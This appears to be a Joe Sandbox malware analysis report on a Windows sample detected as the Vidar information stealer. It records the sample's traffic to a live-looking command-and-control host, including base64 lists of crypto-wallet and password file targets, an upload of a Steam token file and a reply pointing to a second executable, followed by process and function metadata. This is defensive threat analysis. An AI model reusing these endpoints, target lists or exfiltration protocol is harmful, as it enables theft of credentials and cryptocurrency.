Oct 7, 2024 03:15:46.801331997 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="mode"3------HJJJDAEGIDHCBFHJJJEG--
Oct 7, 2024 03:15:47.428766012 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 [TRUNCATED] Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzfDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxwYXNzcGhyYXNlLmpzb258MHxFeG9kdXN8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHNlZWQuc2Vjb3wwfEV4b2R1c3wxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RXhvZHVzfDF8XEV4b2R1c1xiYWNrdXBzXHwqLip8MXxFbGVjdHJvbiBDYXNofDF8XEVsZWN0cm9uQ2FzaFx3YWxsZXRzXHwqLip8MHxNdWx0aURvZ2V8MXxcTXVsdGlEb2d [TRUNCATED]
Oct 7, 2024 03:15:47.674499989 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBA Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="mode"4------DHIDHIEGIIIECAKEBFBA--
Oct 7, 2024 03:15:48.307862997 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e 52 6a 4b 69 34 71 4c 43 70 69 61 58 52 6d 62 48 6c 6c 63 69 6f 75 4b 69 77 71 61 33 56 6a 62 32 6c 75 4b 69 34 71 4c 43 70 6f 64 57 39 69 61 53 6f 75 4b 69 77 71 63 47 39 73 62 32 35 70 5a 58 67 71 4c 69 6f 73 4b 6d 74 79 59 [TRUNCATED] Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0YnRjKi4qLCpiaXRmbHllciouKiwqa3Vjb2luKi4qLCpodW9iaSouKiwqcG9sb25pZXgqLiosKmtyYWtlbiouKiwqb2tleCouKiwqYmluYW5jZSouKiwqYml0ZmluZXgqLiosKmdkYXgqLiosKmV0aGVyZXVtKi4qLCpleG9kdXMqLiosKm1ldGFtYXNrKi4qLCpteWV0aGVyd2FsbGV0Ki4qLCplbGVjdHJ1bSouKiwqYml0Y29pbiouKiwqYmxvY2tjaGFpbiouKiwqY29pbm9taSouKiwqd29yZHMqLiosKm1ldGEqLiosKm1hc2sqLiosKmV0aCouKiwqcmVjb3ZlcnkqLip8MTUwfDN8KndpbmRvd3MqLCpQcm9ncmFtIEZpbGVzKiwqUHJvZ3JhbSBGaWxlcyAoeDg2KSosKkFwcERhdGEqLCpQcm9ncmFtRGF0YSosKi5sbmssKi5leGUsKi5zY3IsKi5jb20sKi5waWYsKi5tcDN8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl [TRUNCATED]
Oct 7, 2024 03:15:48.332036018 CEST	651	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFI Host: lade.petperfectcare.com Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4b 46 48 43 46 49 45 43 41 41 41 4b 45 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 [TRUNCATED] Data Ascii: ------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------AAKKFHCFIECAAAKEGCFIContent-Disposition: form-data; name="file_data"ENT9QA==------AAKKFHCFIECAAAKEGCFI--
Oct 7, 2024 03:15:48.965101957 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 7, 2024 03:15:49.019490004 CEST	192	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIEHDBGDHDAECBGDHJKF Host: lade.petperfectcare.com Content-Length: 97829 Connection: Keep-Alive Cache-Control: no-cache
Oct 7, 2024 03:15:50.369307041 CEST	175	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0
Oct 7, 2024 03:15:50.373224974 CEST	521	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDG Host: lade.petperfectcare.com Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 62 63 34 62 37 63 31 31 63 66 39 36 37 38 36 65 62 31 39 66 61 35 37 35 65 34 64 38 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 31 31 39 33 39 33 35 33 30 38 64 61 31 31 36 32 31 37 36 63 34 34 62 34 32 38 39 38 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="token"d6bc4b7c11cf96786eb19fa575e4d80d------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build_id"4b1193935308da1162176c44b42898a6------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="mode"5------IJJKKJJDAAAAAKFHJJDG--
Oct 7, 2024 03:15:51.091017008 CEST	258	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2024 01:15:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 34 0d 0a 4d 54 49 34 4d 54 55 34 4e 6e 78 6f 64 48 52 77 4f 69 39 74 59 57 78 33 4c 6d 56 7a 59 57 78 6c 63 32 6c 75 4c 6d 4e 76 62 53 39 73 5a 47 31 7a 4c 32 45 30 4d 7a 51 34 4e 6a 45 79 4f 44 4d 30 4e 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 54MTI4MTU4NnxodHRwOi9tYWx3LmVzYWxlc2luLmNvbS9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==0

Target ID:	0
Start time:	21:15:05
Start date:	06/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x1000000
File size:	594'296 bytes
MD5 hash:	E92D327838D5F6952F612283A2425E24
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	21:15:06
Start date:	06/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x880000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.3%
Total number of Nodes:	270
Total number of Limit Nodes:	5

Executed Functions

Function 01001FE0 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 433
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(0108CCE0,000004E4,00000040,?), ref: 01002497

Strings

V, xrefs: 01002408

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: V
API String ID: 544645111-1342839628
Opcode ID: e80f2d1e2d55fa2677a76b27de25623fe2199ad1f63aa6f9d075c5b4dcf3375c
Instruction ID: d510985b461dd883dd5a3d1879bad0622433c7860e55e6df20b76550f4a36260
Opcode Fuzzy Hash: e80f2d1e2d55fa2677a76b27de25623fe2199ad1f63aa6f9d075c5b4dcf3375c
Instruction Fuzzy Hash: 46A10F17634E1F06F30DA03489562FAA54BEBBA731F854337AEE6977E5D35A490182C0

Function 0101A39E Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0ce309dae35eeb64f75d2208773cf58d8f35ba8da59f9c1b76811168d481250
Instruction ID: 32a1a09b10ddfc159415493cb8a135cdb1afbac3fa6de748e376593ab4b26d29
Opcode Fuzzy Hash: f0ce309dae35eeb64f75d2208773cf58d8f35ba8da59f9c1b76811168d481250
Instruction Fuzzy Hash: 07E08C32A12268EBCB25EB8DC944A8AF7ECEB45A10B11409BF601E3104C2B4DE00C7D0

Function 01010C7E Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26b61e700e3e5bce12354a0b1fde2f27a5d579f549683416bfe0bcbdbbb751ec
Instruction ID: 7ade325902446d193ef34f87ba009d7a6a4167f3873e5e1dad1aa78121e689ac
Opcode Fuzzy Hash: 26b61e700e3e5bce12354a0b1fde2f27a5d579f549683416bfe0bcbdbbb751ec
Instruction Fuzzy Hash: D3C08C34141F4487CE2AAE1882743A93394A39178AF9008CCD5D24BA4AC56E98C2DA10

Function 01015C98 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,6D81AB67,?,01015DA5,0100C196,?,F8250000,00000000), ref: 01015D59

Strings

api-ms-, xrefs: 01015CEF
ext-ms-, xrefs: 01015D03

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 41bfc275dd7dc16cedfb185c1b31ec41b95abccdeef807b3fbe4beb1e8e923b0
Instruction ID: ad4df8eb2c601e2a8381e095e90e3a05c2c03a950ceb174d9db527dcbd7710fa
Opcode Fuzzy Hash: 41bfc275dd7dc16cedfb185c1b31ec41b95abccdeef807b3fbe4beb1e8e923b0
Instruction Fuzzy Hash: FB210B71600215A7C7316E64DC49A5A37A9EB83760F650150EDD6AF289D73DDD01C7E0

Function 01018B7C Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__freea.LIBCMT ref: 01018D2B

Part of subcall function 010137D3: HeapAlloc.KERNEL32(00000000,01019EFA,?,?,01019EFA,00000220,?,?,?), ref: 01013805

__freea.LIBCMT ref: 01018D40
__freea.LIBCMT ref: 01018D50

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: __freea$AllocHeap
String ID:
API String ID: 85559729-0
Opcode ID: 0a3f6dc48b8e99954f4749d10397cc68a9491332cfca1c59239f186ca3d2a855
Instruction ID: 16205362cc9e2d5519d3caf9a99925a25ee0122db47faeda4d4c23afb5c468c9
Opcode Fuzzy Hash: 0a3f6dc48b8e99954f4749d10397cc68a9491332cfca1c59239f186ca3d2a855
Instruction Fuzzy Hash: 7C51D7B260121AAFEB216F64CC80DFF3BE9EF14650B55856AFD84D6158E739CE1086A0

Function 01010C0A Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(01010D60,?,01010C04,00000000,?,?,01010D60,6D81AB67,?,01010D60), ref: 01010C1B
TerminateProcess.KERNEL32(00000000,?,01010C04,00000000,?,?,01010D60,6D81AB67,?,01010D60), ref: 01010C22
ExitProcess.KERNEL32 ref: 01010C34

Memory Dump Source

Source File: 00000000.00000002.2103211179.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2103186471.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103277585.0000000001022000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103299834.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103362948.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103389180.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2103413797.000000000108F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 28f4bbe592d43036e5fd84008299f6f7690ede4ebbf0cab7bad649d74f80eaa8
Instruction ID: 5046a52a2cd12283c02adbfa86e5f6024a6cf51b9932c74caa3ef41825c01049
Opcode Fuzzy Hash: 28f4bbe592d43036e5fd84008299f6f7690ede4ebbf0cab7bad649d74f80eaa8
